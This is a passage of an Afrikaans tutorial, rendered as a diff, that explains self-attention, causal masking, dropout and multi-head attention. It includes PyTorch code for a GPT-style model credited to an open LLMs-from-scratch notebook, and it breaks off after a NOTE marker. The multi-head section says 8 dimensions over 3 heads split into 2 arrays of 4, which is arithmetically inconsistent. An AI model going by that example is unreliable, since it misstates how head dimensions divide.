Elke token sal sy eie vraag, sleutel en waarde matriks hê deur sy dimensiewaarde met die gedefinieerde matrikse te vermenigvuldig:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Hierdie matrikse transformeer die oorspronklike embeddings in 'n nuwe ruimte wat geskik is vir die berekening van aandag.
|
|
||||||
|
|
||||||
**Voorbeeld**
|
|
||||||
|
|
||||||
Aannemend:
|
|
||||||
|
|
||||||
- Invoer dimensie `din=3` (embedding grootte)
|
|
||||||
- Uitvoer dimensie `dout=2` (gewens dimensie vir vrae, sleutels, en waardes)
|
|
||||||
|
|
||||||
Inisialiseer die gewig matrikse:
|
|
||||||
```python
|
|
||||||
import torch.nn as nn
|
|
||||||
|
|
||||||
d_in = 3
|
|
||||||
d_out = 2
|
|
||||||
|
|
||||||
W_query = nn.Parameter(torch.rand(d_in, d_out))
|
|
||||||
W_key = nn.Parameter(torch.rand(d_in, d_out))
|
|
||||||
W_value = nn.Parameter(torch.rand(d_in, d_out))
|
|
||||||
```
|
|
||||||
Bereken vrae, sleutels en waardes:
|
|
||||||
```python
|
|
||||||
queries = torch.matmul(inputs, W_query)
|
|
||||||
keys = torch.matmul(inputs, W_key)
|
|
||||||
values = torch.matmul(inputs, W_value)
|
|
||||||
```
|
|
||||||
#### Stap 2: Bereken Geskaalde Dot-Produk Aandag
|
|
||||||
|
|
||||||
**Bereken Aandag Punte**
|
|
||||||
|
|
||||||
Soos in die vorige voorbeeld, maar hierdie keer, in plaas daarvan om die waardes van die dimensies van die tokens te gebruik, gebruik ons die sleutel matriks van die token (wat reeds bereken is met behulp van die dimensies):. So, vir elke navraag `qi` en sleutel `kj`:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**Skaal die Punte**
|
|
||||||
|
|
||||||
Om te voorkom dat die dot produkte te groot word, skaal hulle met die vierkantswortel van die sleutel dimensie `dk`:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die punt word gedeel deur die vierkantswortel van die dimensies omdat dot produkte baie groot kan word en dit help om hulle te reguleer.
|
|
||||||
|
|
||||||
**Pas Softmax toe om Aandag Gewigte te Verkry:** Soos in die aanvanklike voorbeeld, normaliseer al die waardes sodat hulle 1 som.
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
#### Stap 3: Bereken Konteks Vektore
|
|
||||||
|
|
||||||
Soos in die aanvanklike voorbeeld, som net al die waardes matriks op deur elkeen met sy aandag gewig te vermenigvuldig:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
### Kode Voorbeeld
|
|
||||||
|
|
||||||
Gryp 'n voorbeeld van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) jy kan hierdie klas kyk wat die self-aandag funksionaliteit implementeer waaroor ons gepraat het:
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
|
|
||||||
inputs = torch.tensor(
|
|
||||||
[[0.43, 0.15, 0.89], # Your (x^1)
|
|
||||||
[0.55, 0.87, 0.66], # journey (x^2)
|
|
||||||
[0.57, 0.85, 0.64], # starts (x^3)
|
|
||||||
[0.22, 0.58, 0.33], # with (x^4)
|
|
||||||
[0.77, 0.25, 0.10], # one (x^5)
|
|
||||||
[0.05, 0.80, 0.55]] # step (x^6)
|
|
||||||
)
|
|
||||||
|
|
||||||
import torch.nn as nn
|
|
||||||
class SelfAttention_v2(nn.Module):
|
|
||||||
|
|
||||||
def __init__(self, d_in, d_out, qkv_bias=False):
|
|
||||||
super().__init__()
|
|
||||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
keys = self.W_key(x)
|
|
||||||
queries = self.W_query(x)
|
|
||||||
values = self.W_value(x)
|
|
||||||
|
|
||||||
attn_scores = queries @ keys.T
|
|
||||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
|
||||||
|
|
||||||
context_vec = attn_weights @ values
|
|
||||||
return context_vec
|
|
||||||
|
|
||||||
d_in=3
|
|
||||||
d_out=2
|
|
||||||
torch.manual_seed(789)
|
|
||||||
sa_v2 = SelfAttention_v2(d_in, d_out)
|
|
||||||
print(sa_v2(inputs))
|
|
||||||
```
|
|
||||||
> [!NOTE]
|
|
||||||
> Let daarop dat in plaas van om die matriks met ewekansige waardes te initialiseer, `nn.Linear` gebruik word om al die gewigte as parameters te merk om te train.
|
|
||||||
|
|
||||||
## Causale Aandag: Toekomstige Woorde Versteek
|
|
||||||
|
|
||||||
Vir LLMs wil ons hê dat die model slegs die tokens moet oorweeg wat voor die huidige posisie verskyn om die **volgende token** te **voorspel**. **Causale aandag**, ook bekend as **gemaskeerde aandag**, bereik dit deur die aandagmeganisme te wysig om toegang tot toekomstige tokens te verhoed.
|
|
||||||
|
|
||||||
### Toepassing van 'n Causale Aandagmasker
|
|
||||||
|
|
||||||
Om causale aandag te implementeer, pas ons 'n masker toe op die aandag punte **voor die softmax operasie** sodat die oorblywende punte steeds 1 sal som. Hierdie masker stel die aandag punte van toekomstige tokens op negatiewe oneindigheid, wat verseker dat na die softmax, hul aandag gewigte nul is.
|
|
||||||
|
|
||||||
**Stappe**
|
|
||||||
|
|
||||||
1. **Bereken Aandag Punten**: Dieselfde as voorheen.
|
|
||||||
2. **Pas Masker Toe**: Gebruik 'n boonste driehoekige matriks wat met negatiewe oneindigheid bo die diagonaal gevul is.
|
|
||||||
|
|
||||||
```python
|
|
||||||
mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
|
|
||||||
masked_scores = attention_scores + mask
|
|
||||||
```
|
|
||||||
|
|
||||||
3. **Pas Softmax Toe**: Bereken aandag gewigte met behulp van die gemaskeerde punte.
|
|
||||||
|
|
||||||
```python
|
|
||||||
attention_weights = torch.softmax(masked_scores, dim=-1)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Maskering van Bykomende Aandag Gewigte met Dropout
|
|
||||||
|
|
||||||
Om **oorpassing te voorkom**, kan ons **dropout** toepas op die aandag gewigte na die softmax operasie. Dropout **maak sommige van die aandag gewigte ewekansig nul** tydens opleiding.
|
|
||||||
```python
|
|
||||||
dropout = nn.Dropout(p=0.5)
|
|
||||||
attention_weights = dropout(attention_weights)
|
|
||||||
```
|
|
||||||
'n Gereelde dropout is ongeveer 10-20%.
|
|
||||||
|
|
||||||
### Code Voorbeeld
|
|
||||||
|
|
||||||
Code voorbeeld van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
import torch.nn as nn
|
|
||||||
|
|
||||||
inputs = torch.tensor(
|
|
||||||
[[0.43, 0.15, 0.89], # Your (x^1)
|
|
||||||
[0.55, 0.87, 0.66], # journey (x^2)
|
|
||||||
[0.57, 0.85, 0.64], # starts (x^3)
|
|
||||||
[0.22, 0.58, 0.33], # with (x^4)
|
|
||||||
[0.77, 0.25, 0.10], # one (x^5)
|
|
||||||
[0.05, 0.80, 0.55]] # step (x^6)
|
|
||||||
)
|
|
||||||
|
|
||||||
batch = torch.stack((inputs, inputs), dim=0)
|
|
||||||
print(batch.shape)
|
|
||||||
|
|
||||||
class CausalAttention(nn.Module):
|
|
||||||
|
|
||||||
def __init__(self, d_in, d_out, context_length,
|
|
||||||
dropout, qkv_bias=False):
|
|
||||||
super().__init__()
|
|
||||||
self.d_out = d_out
|
|
||||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.dropout = nn.Dropout(dropout)
|
|
||||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
b, num_tokens, d_in = x.shape
|
|
||||||
# b is the num of batches
|
|
||||||
# num_tokens is the number of tokens per batch
|
|
||||||
# d_in is the dimensions er token
|
|
||||||
|
|
||||||
keys = self.W_key(x) # This generates the keys of the tokens
|
|
||||||
queries = self.W_query(x)
|
|
||||||
values = self.W_value(x)
|
|
||||||
|
|
||||||
attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
|
|
||||||
attn_scores.masked_fill_( # New, _ ops are in-place
|
|
||||||
self.mask.bool()[:num_tokens, :num_tokens], -torch.inf) # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
|
|
||||||
attn_weights = torch.softmax(
|
|
||||||
attn_scores / keys.shape[-1]**0.5, dim=-1
|
|
||||||
)
|
|
||||||
attn_weights = self.dropout(attn_weights)
|
|
||||||
|
|
||||||
context_vec = attn_weights @ values
|
|
||||||
return context_vec
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
context_length = batch.shape[1]
|
|
||||||
d_in = 3
|
|
||||||
d_out = 2
|
|
||||||
ca = CausalAttention(d_in, d_out, context_length, 0.0)
|
|
||||||
|
|
||||||
context_vecs = ca(batch)
|
|
||||||
|
|
||||||
print(context_vecs)
|
|
||||||
print("context_vecs.shape:", context_vecs.shape)
|
|
||||||
```
|
|
||||||
## Om Enkelkop Aandag uit te brei na Meerkop Aandag
|
|
||||||
|
|
||||||
**Meerkop aandag** bestaan in praktiese terme uit die uitvoering van **meerdere instansies** van die self-aandag funksie, elk met **hulle eie gewigte**, sodat verskillende finale vektore bereken kan word.
|
|
||||||
|
|
||||||
### Kode Voorbeeld
|
|
||||||
|
|
||||||
Dit kan moontlik wees om die vorige kode te hergebruik en net 'n omhulsel toe te voeg wat dit verskeie kere begin, maar dit is 'n meer geoptimaliseerde weergawe van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) wat al die koppe gelyktydig verwerk (wat die aantal duur vir-lusse verminder). Soos jy in die kode kan sien, word die dimensies van elke token in verskillende dimensies verdeel volgens die aantal koppe. Op hierdie manier, as 'n token 8 dimensies het en ons 3 koppe wil gebruik, sal die dimensies in 2 arrays van 4 dimensies verdeel word en elke kop sal een daarvan gebruik:
|
|
||||||
```python
|
|
||||||
class MultiHeadAttention(nn.Module):
|
|
||||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
|
||||||
super().__init__()
|
|
||||||
assert (d_out % num_heads == 0), \
|
|
||||||
"d_out must be divisible by num_heads"
|
|
||||||
|
|
||||||
self.d_out = d_out
|
|
||||||
self.num_heads = num_heads
|
|
||||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
|
||||||
|
|
||||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
|
||||||
self.dropout = nn.Dropout(dropout)
|
|
||||||
self.register_buffer(
|
|
||||||
"mask",
|
|
||||||
torch.triu(torch.ones(context_length, context_length),
|
|
||||||
diagonal=1)
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
b, num_tokens, d_in = x.shape
|
|
||||||
# b is the num of batches
|
|
||||||
# num_tokens is the number of tokens per batch
|
|
||||||
# d_in is the dimensions er token
|
|
||||||
|
|
||||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
|
||||||
queries = self.W_query(x)
|
|
||||||
values = self.W_value(x)
|
|
||||||
|
|
||||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
|
||||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
|
||||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
|
|
||||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
|
||||||
keys = keys.transpose(1, 2)
|
|
||||||
queries = queries.transpose(1, 2)
|
|
||||||
values = values.transpose(1, 2)
|
|
||||||
|
|
||||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
|
||||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
|
||||||
|
|
||||||
# Original mask truncated to the number of tokens and converted to boolean
|
|
||||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
|
||||||
|
|
||||||
# Use the mask to fill attention scores
|
|
||||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
|
||||||
|
|
||||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
|
||||||
attn_weights = self.dropout(attn_weights)
|
|
||||||
|
|
||||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
|
||||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
|
||||||
|
|
||||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
|
||||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
|
|
||||||
context_vec = self.out_proj(context_vec) # optional projection
|
|
||||||
|
|
||||||
return context_vec
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
batch_size, context_length, d_in = batch.shape
|
|
||||||
d_out = 2
|
|
||||||
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)
|
|
||||||
|
|
||||||
context_vecs = mha(batch)
|
|
||||||
|
|
||||||
print(context_vecs)
|
|
||||||
print("context_vecs.shape:", context_vecs.shape)
|
|
||||||
|
|
||||||
```
|
|
||||||
Vir 'n ander kompakte en doeltreffende implementering kan jy die [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) klas in PyTorch gebruik.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Kort antwoord van ChatGPT oor hoekom dit beter is om dimensies van tokens onder die koppe te verdeel in plaas daarvan om elke kop al die dimensies van al die tokens te laat nagaan:
|
|
||||||
>
|
|
||||||
> Terwyl dit mag voorkom asof dit voordelig is om elke kop al die inbedingsdimensies te laat verwerk omdat elke kop toegang tot die volle inligting sou hê, is die standaardpraktyk om die **inbedingsdimensies onder die koppe te verdeel**. Hierdie benadering balanseer rekenkundige doeltreffendheid met modelprestasie en moedig elke kop aan om diverse voorstellings te leer. Daarom is dit oor die algemeen verkieslik om die inbedingsdimensies te verdeel eerder as om elke kop al die dimensies te laat nagaan.
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,666 +0,0 @@
|
|||||||
# 5. LLM Argitektuur
|
|
||||||
|
|
||||||
## LLM Argitektuur
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie vyfde fase is baie eenvoudig: **Ontwikkel die argitektuur van die volle LLM**. Sit alles saam, pas al die lae toe en skep al die funksies om teks te genereer of teks na ID's en terug te transformeer.
|
|
||||||
>
|
|
||||||
> Hierdie argitektuur sal gebruik word vir beide, opleiding en voorspellings van teks nadat dit opgelei is.
|
|
||||||
|
|
||||||
LLM argitektuur voorbeeld van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
|
|
||||||
|
|
||||||
'n Hoë vlak voorstelling kan waargeneem word in:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
|
|
||||||
|
|
||||||
1. **Invoer (Getokeniseerde Teks)**: Die proses begin met getokeniseerde teks, wat in numeriese voorstellings omgeskakel word.
|
|
||||||
2. **Token Inbed en Posisionele Inbed Laag**: Die getokeniseerde teks word deur 'n **token inbed** laag en 'n **posisionele inbed laag** gestuur, wat die posisie van tokens in 'n volgorde vasvang, krities vir die begrip van woordorde.
|
|
||||||
3. **Transformer Blokke**: Die model bevat **12 transformer blokke**, elk met verskeie lae. Hierdie blokke herhaal die volgende volgorde:
|
|
||||||
- **Gemaskerde Multi-Kop Aandag**: Laat die model toe om op verskillende dele van die invoerteks gelyktydig te fokus.
|
|
||||||
- **Laag Normalisering**: 'n Normalisering stap om opleiding te stabiliseer en te verbeter.
|
|
||||||
- **Voed Voor Laag**: Verantwoordelik vir die verwerking van die inligting van die aandaglaag en om voorspellings oor die volgende token te maak.
|
|
||||||
- **Dropout Lae**: Hierdie lae voorkom oorpassing deur eenhede tydens opleiding lukraak te laat val.
|
|
||||||
4. **Finale Uitvoer Laag**: Die model lewer 'n **4x50,257-dimensionele tensor**, waar **50,257** die grootte van die woordeskat verteenwoordig. Elke ry in hierdie tensor kom ooreen met 'n vektor wat die model gebruik om die volgende woord in die volgorde te voorspel.
|
|
||||||
5. **Doel**: Die doel is om hierdie inbedings te neem en dit terug in teks om te skakel. Spesifiek, die laaste ry van die uitvoer word gebruik om die volgende woord te genereer, wat in hierdie diagram as "vorentoe" verteenwoordig word.
|
|
||||||
|
|
||||||
### Kode voorstelling
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
import torch.nn as nn
|
|
||||||
import tiktoken
|
|
||||||
|
|
||||||
class GELU(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super().__init__()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return 0.5 * x * (1 + torch.tanh(
|
|
||||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
|
||||||
(x + 0.044715 * torch.pow(x, 3))
|
|
||||||
))
|
|
||||||
|
|
||||||
class FeedForward(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.layers = nn.Sequential(
|
|
||||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
|
||||||
GELU(),
|
|
||||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return self.layers(x)
|
|
||||||
|
|
||||||
class MultiHeadAttention(nn.Module):
|
|
||||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
|
||||||
super().__init__()
|
|
||||||
assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
|
|
||||||
|
|
||||||
self.d_out = d_out
|
|
||||||
self.num_heads = num_heads
|
|
||||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
|
||||||
|
|
||||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
|
||||||
self.dropout = nn.Dropout(dropout)
|
|
||||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
b, num_tokens, d_in = x.shape
|
|
||||||
|
|
||||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
|
||||||
queries = self.W_query(x)
|
|
||||||
values = self.W_value(x)
|
|
||||||
|
|
||||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
|
||||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
|
||||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
|
|
||||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
|
||||||
keys = keys.transpose(1, 2)
|
|
||||||
queries = queries.transpose(1, 2)
|
|
||||||
values = values.transpose(1, 2)
|
|
||||||
|
|
||||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
|
||||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
|
||||||
|
|
||||||
# Original mask truncated to the number of tokens and converted to boolean
|
|
||||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
|
||||||
|
|
||||||
# Use the mask to fill attention scores
|
|
||||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
|
||||||
|
|
||||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
|
||||||
attn_weights = self.dropout(attn_weights)
|
|
||||||
|
|
||||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
|
||||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
|
||||||
|
|
||||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
|
||||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
|
|
||||||
context_vec = self.out_proj(context_vec) # optional projection
|
|
||||||
|
|
||||||
return context_vec
|
|
||||||
|
|
||||||
class LayerNorm(nn.Module):
|
|
||||||
def __init__(self, emb_dim):
|
|
||||||
super().__init__()
|
|
||||||
self.eps = 1e-5
|
|
||||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
|
||||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
mean = x.mean(dim=-1, keepdim=True)
|
|
||||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
|
||||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
|
||||||
return self.scale * norm_x + self.shift
|
|
||||||
|
|
||||||
class TransformerBlock(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.att = MultiHeadAttention(
|
|
||||||
d_in=cfg["emb_dim"],
|
|
||||||
d_out=cfg["emb_dim"],
|
|
||||||
context_length=cfg["context_length"],
|
|
||||||
num_heads=cfg["n_heads"],
|
|
||||||
dropout=cfg["drop_rate"],
|
|
||||||
qkv_bias=cfg["qkv_bias"])
|
|
||||||
self.ff = FeedForward(cfg)
|
|
||||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
# Shortcut connection for attention block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm1(x)
|
|
||||||
x = self.att(x) # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
# Shortcut connection for feed forward block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm2(x)
|
|
||||||
x = self.ff(x)
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
return x
|
|
||||||
|
|
||||||
|
|
||||||
class GPTModel(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
|
||||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
|
||||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
self.trf_blocks = nn.Sequential(
|
|
||||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
|
|
||||||
|
|
||||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.out_head = nn.Linear(
|
|
||||||
cfg["emb_dim"], cfg["vocab_size"], bias=False
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, in_idx):
|
|
||||||
batch_size, seq_len = in_idx.shape
|
|
||||||
tok_embeds = self.tok_emb(in_idx)
|
|
||||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
|
|
||||||
x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_emb(x)
|
|
||||||
x = self.trf_blocks(x)
|
|
||||||
x = self.final_norm(x)
|
|
||||||
logits = self.out_head(x)
|
|
||||||
return logits
|
|
||||||
|
|
||||||
GPT_CONFIG_124M = {
|
|
||||||
"vocab_size": 50257, # Vocabulary size
|
|
||||||
"context_length": 1024, # Context length
|
|
||||||
"emb_dim": 768, # Embedding dimension
|
|
||||||
"n_heads": 12, # Number of attention heads
|
|
||||||
"n_layers": 12, # Number of layers
|
|
||||||
"drop_rate": 0.1, # Dropout rate
|
|
||||||
"qkv_bias": False # Query-Key-Value bias
|
|
||||||
}
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
out = model(batch)
|
|
||||||
print("Input batch:\n", batch)
|
|
||||||
print("\nOutput shape:", out.shape)
|
|
||||||
print(out)
|
|
||||||
```
|
|
||||||
### **GELU Aktivering Funksie**
|
|
||||||
```python
|
|
||||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
|
||||||
class GELU(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super().__init__()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return 0.5 * x * (1 + torch.tanh(
|
|
||||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
|
||||||
(x + 0.044715 * torch.pow(x, 3))
|
|
||||||
))
|
|
||||||
```
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **GELU (Gaussian Error Linear Unit):** 'n Aktiveringsfunksie wat nie-lineariteit in die model inbring.
|
|
||||||
- **Glad Aktivering:** Anders as ReLU, wat negatiewe insette op nul stel, kaart GELU insette glad na uitsette, wat klein, nie-nul waardes vir negatiewe insette toelaat.
|
|
||||||
- **Wiskundige Definisie:**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Die doel van die gebruik van hierdie funksie na lineêre lae binne die FeedForward-laag is om die lineêre data nie-lineêr te maak sodat die model komplekse, nie-lineêre verhoudings kan leer.
|
|
||||||
|
|
||||||
### **FeedForward Neurale Netwerk**
|
|
||||||
|
|
||||||
_Vorms is as kommentaar bygevoeg om die vorms van matrikse beter te verstaan:_
|
|
||||||
```python
|
|
||||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
|
||||||
class FeedForward(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.layers = nn.Sequential(
|
|
||||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
|
||||||
GELU(),
|
|
||||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
# x shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
|
|
||||||
x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
|
|
||||||
x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
|
|
||||||
return x # Output shape: (batch_size, seq_len, emb_dim)
|
|
||||||
```
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **Posisiegewys FeedForward Netwerk:** Pas 'n twee-laag ten volle verbind netwerk op elke posisie apart en identies toe.
|
|
||||||
- **Laag Besonderhede:**
|
|
||||||
- **Eerste Lineêre Laag:** Brei die dimensie uit van `emb_dim` na `4 * emb_dim`.
|
|
||||||
- **GELU Aktivering:** Pas nie-lineariteit toe.
|
|
||||||
- **Tweede Lineêre Laag:** Verminder die dimensie terug na `emb_dim`.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
